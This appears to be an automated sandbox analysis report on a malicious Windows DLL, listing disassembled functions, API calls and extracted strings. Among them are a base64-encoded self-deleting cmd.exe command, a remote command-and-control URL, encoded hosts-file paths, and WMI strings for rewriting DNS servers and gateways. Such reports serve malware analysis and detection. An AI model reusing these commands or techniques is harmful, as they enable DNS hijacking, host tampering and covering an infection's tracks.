                                                                                                                                                                          • Opcode ID: 1cce8b5a67d1c0309ddc25410ac38e774623329da0b50d555193a5a202d75592
                                                                                                                                                                          • Instruction ID: bb6bdb58cefd5e44e49d1627913aef4aeff738b68846c80ec3bbf11df7cf1561
                                                                                                                                                                          • Opcode Fuzzy Hash: 1cce8b5a67d1c0309ddc25410ac38e774623329da0b50d555193a5a202d75592
                                                                                                                                                                          • Instruction Fuzzy Hash: EA017BB1004145BFDB12EB18DC86AEF7B6DFF08384F00487AF744A5101DBB0AA908B52
                                                                                                                                                                          Function 10032FA9 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 1000882E
                                                                                                                                                                          • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-2405328761
                                                                                                                                                                          • Opcode ID: b5c48f888dfecde0d558b015ec8f1f1c3f49a66d89e9b823a58c77ddb73fef5d
                                                                                                                                                                          • Instruction ID: 7a77bbc51d72140f9c2326b4124f9ea1a8ce26b4521abcaaadc08c9dd59f4ac5
                                                                                                                                                                          • Opcode Fuzzy Hash: b5c48f888dfecde0d558b015ec8f1f1c3f49a66d89e9b823a58c77ddb73fef5d
                                                                                                                                                                          • Instruction Fuzzy Hash: 52012B75404249BFDB12DB24DC866EF7769FF44385F404879F74469041CB70AEE48B92
                                                                                                                                                                          Function 10033A47 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 1000882E
                                                                                                                                                                          • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-2405328761
                                                                                                                                                                          • Opcode ID: aa79f2954bc5f93b84339fc1848aaa8a816fb077c707d78791f31be835c7fb07
                                                                                                                                                                          • Instruction ID: 786ef41332bcc0b56883049e359fcb6442b6f172d9007c0e43407e1f34b6c678
                                                                                                                                                                          • Opcode Fuzzy Hash: aa79f2954bc5f93b84339fc1848aaa8a816fb077c707d78791f31be835c7fb07
                                                                                                                                                                          • Instruction Fuzzy Hash: E9F04E71004149AFDB12DB60DC85AED7B68FF04384F000975F79465081CB70AAD48B51
                                                                                                                                                                          Function 10007A85 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID: $p=Vu
                                                                                                                                                                          • API String ID: 1927566239-153977967
                                                                                                                                                                          • Opcode ID: 2617da6f400d1deaaaa6cae9f7d6c62b2ab23f642a8ca5aad293c1072a977483
                                                                                                                                                                          • Instruction ID: eb1a3d92cece7d0a5f388039fb4e2ce0f3b3243cd5656f56a25f0c556dfa24ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 2617da6f400d1deaaaa6cae9f7d6c62b2ab23f642a8ca5aad293c1072a977483
                                                                                                                                                                          • Instruction Fuzzy Hash: A7418375D0025A9BEF04DFA4C984AEEB7F8FF04284F10456EE90AA3245DB38AE04C761
                                                                                                                                                                          Function 10005FAA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FE6
                                                                                                                                                                            • Part of subcall function 10004015: CreateFileA.KERNEL32(00000080,00000003,00000000,00000000,80000000,?,10005CCD,?,10005CCD,?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 1000402D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateTimer$Concurrency::details::platform::__FileQueue
                                                                                                                                                                          • String ID: %s\lang.ini$C:\Users\user\Desktop
                                                                                                                                                                          • API String ID: 3486561800-2493208567
                                                                                                                                                                          • Opcode ID: 6200248614817e95060a104c4db4876e5c13f10302091e83b8c336038b3b62ce
                                                                                                                                                                          • Instruction ID: f0c7cfe85b99a9a6962fd168fd8ca27dd728b3318427dc120af1c7e287bf5290
                                                                                                                                                                          • Opcode Fuzzy Hash: 6200248614817e95060a104c4db4876e5c13f10302091e83b8c336038b3b62ce
                                                                                                                                                                          • Instruction Fuzzy Hash: E6F046768001187AE620D665DC06FEF3E6CCF813E0F104122FA08AA0C5EAB4AAC0D6B0

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:0.6%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:28
                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                          execution_graph 29716 10001812 29717 10001817 29716->29717 29720 10001000 29717->29720 29719 10001821 29721 100016c0 29720->29721 29724 10021753 29721->29724 29723 10001804 ctype 29723->29719 29725 10021758 29724->29725 29728 1002f839 wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29725->29728 29729 100025d2 29730 100025d7 29729->29730 29731 10001000 5 API calls 29730->29731 29732 100025e1 29731->29732 29735 10028391 wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29732->29735 29740 10002523 29741 10002528 29740->29741 29742 10001000 5 API calls 29741->29742 29743 10002532 29742->29743 29746 10024275 29743->29746 29747 10024294 29746->29747 29750 1003b76d 6 API calls 29747->29750 29755 10004468 29756 10004478 29755->29756 29759 100290bf wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29756->29759 29764 100018ee 29765 100018f3 29764->29765 29766 10001000 5 API calls 29765->29766 29767 100018fd 29766->29767

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 1000CD1A Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 189 1000cd1a-1000cd26 call 1002e244 call 1002fcaa
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0cac8ab3a70285047468c69ee232a774f5b83f97ee4095c7ae26fa2f9415f207
                                                                                                                                                                          • Instruction ID: 4eedc2aa77c9d59bcddca50e965c985171f4ab6a32ddcd3d91d86852c72849b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 0cac8ab3a70285047468c69ee232a774f5b83f97ee4095c7ae26fa2f9415f207
                                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 10007231 Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 366COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 1000735B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007370
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 1000738B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 1000739A
                                                                                                                                                                            • Part of subcall function 10007A85: VariantInit.OLEAUT32(?), ref: 10007AC4
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007528
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007536
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                                                          • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=Vu
                                                                                                                                                                          • API String ID: 2640012081-1190809373
                                                                                                                                                                          • Opcode ID: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction ID: 9ca97b7ebb433752ffed003b4f688b974b795f87ac827d3fa99277f148b18eb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction Fuzzy Hash: EDD16074D00219EFEB15CFA4C8809EEBBB5FF04781F204419F419AB259DB75AA45CFA1
                                                                                                                                                                          Function 100053C9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 227sleepfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005449
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000538F
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000539C
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053A5
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053B2
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054B0
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054CE
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(?,?,76078400,?,00000000), ref: 100054F0
                                                                                                                                                                          • rand.MSVCRT ref: 1000553C
                                                                                                                                                                          • rand.MSVCRT ref: 1000554A
                                                                                                                                                                          • rand.MSVCRT ref: 10005555
                                                                                                                                                                          • rand.MSVCRT ref: 10005560
                                                                                                                                                                          • rand.MSVCRT ref: 1000556B
                                                                                                                                                                          • rand.MSVCRT ref: 10005576
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005594
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100055C0
                                                                                                                                                                          Strings
                                                                                                                                                                          • c:\windows\system32\drivers\%s, xrefs: 100054AA
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054BB
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 10005581
                                                                                                                                                                          • %s\%s, xrefs: 10005443
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: rand$InitializeThunkwsprintf$FilePrintSleep
                                                                                                                                                                          • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                                                          • API String ID: 3997227624-455112146
                                                                                                                                                                          • Opcode ID: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
                                                                                                                                                                          • Instruction ID: 707e71cc3576b89c72abdeb88e14083c0e5233f75fe593892cbd880b6aeee3b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C61F973A00258BFEB14DB64CC46FEB77AEEB84351F144466FA049B1D0DB76EA848A50
                                                                                                                                                                          Function 10006F01 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 174sleeplibraryfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 10006F47
                                                                                                                                                                          • LdrInitializeThunk.NTDLL ref: 10006FAE
                                                                                                                                                                          • LdrInitializeThunk.NTDLL ref: 10006FC5
                                                                                                                                                                          • Sleep.KERNEL32 ref: 1000707C
                                                                                                                                                                          • wsprintfA.USER32 ref: 100070C0
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000), ref: 100070F9
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000,?,00000000), ref: 1000710C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileInitializePrintSleepThunk$wsprintf
                                                                                                                                                                          • String ID: QVNEU3ZjLmV4ZQ==$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
                                                                                                                                                                          • API String ID: 983772623-3558339448
                                                                                                                                                                          • Opcode ID: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
                                                                                                                                                                          • Instruction ID: fb61bf4e8c3f987df104399158fbbd5fa82b7bd29b5b13544636659ff5ce8687
                                                                                                                                                                          • Opcode Fuzzy Hash: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
                                                                                                                                                                          • Instruction Fuzzy Hash: 7551D8B6D04359BAF721D764CC55FCE77ACEB08381F2045A1F208AA086DA75BB808E51
                                                                                                                                                                          Function 10004D48 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 306COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004ED7
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004EDD
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004EE3
                                                                                                                                                                          • VariantInit.OLEAUT32(?,?,?,00000000), ref: 10005021
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
